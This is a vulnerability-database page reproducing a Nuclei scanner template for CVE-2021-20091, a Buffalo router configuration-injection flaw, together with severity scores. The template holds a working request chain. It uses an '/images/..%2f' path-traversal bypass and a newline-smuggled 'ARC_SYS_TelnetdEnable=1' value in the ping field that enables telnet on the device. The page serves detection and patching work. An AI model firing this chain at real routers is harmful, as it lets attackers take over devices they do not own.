Lucene search

K
nuclei
ProjectDiscoveryNUCLEI:CVE-2021-20091
HistoryAug 11, 2021 - 12:28 p.m.

Buffalo WSR-2533DHPL2 - Configuration File Injection

2021-08-1112:28:20
ProjectDiscovery
github.com
6

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%

The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
id: CVE-2021-20091

info:
  name: Buffalo WSR-2533DHPL2 - Configuration File Injection
  author: gy741,pdteam,parth
  severity: high
  description: |
    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
  impact: |
    An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.
  remediation: |
    Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.
  reference:
    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
    - https://www.tenable.com/security/research/tra-2021-13
    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20091
    epss-score: 0.00928
    epss-percentile: 0.81222
    cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: buffalo
    product: wsr-2533dhpl2-bk_firmware
  tags: cve2021,cve,buffalo,firmware,iot,tenable

http:
  - raw:
      - |
        GET /images/..%2finfo.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
      - |
        POST /images/..%2fapply_abstract.cgi HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
        Content-Type: application/x-www-form-urlencoded

        action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/Success.htm"

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: httoken
        group: 1
        regex:
          - 'base64\,(.*?)" border='
        internal: true
# digest: 4b0a00483046022100dd49a706de9b916f92684a08c80476589aa14b407bde15ee8a4cc56622060174022100d77abfdb0134802a565bbd5c593e458978e19bf0ff9973231988835c3199bfe8:922c64590222798bb761d5b6d8e72950
Use Vulners API to create your own security tool

API usage cases
  • Network scanning
  • Linux Patch management
  • Threat protection
  • No network audit solution

Ways of integration

Integrate Vulners API

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%

Related for NUCLEI:CVE-2021-20091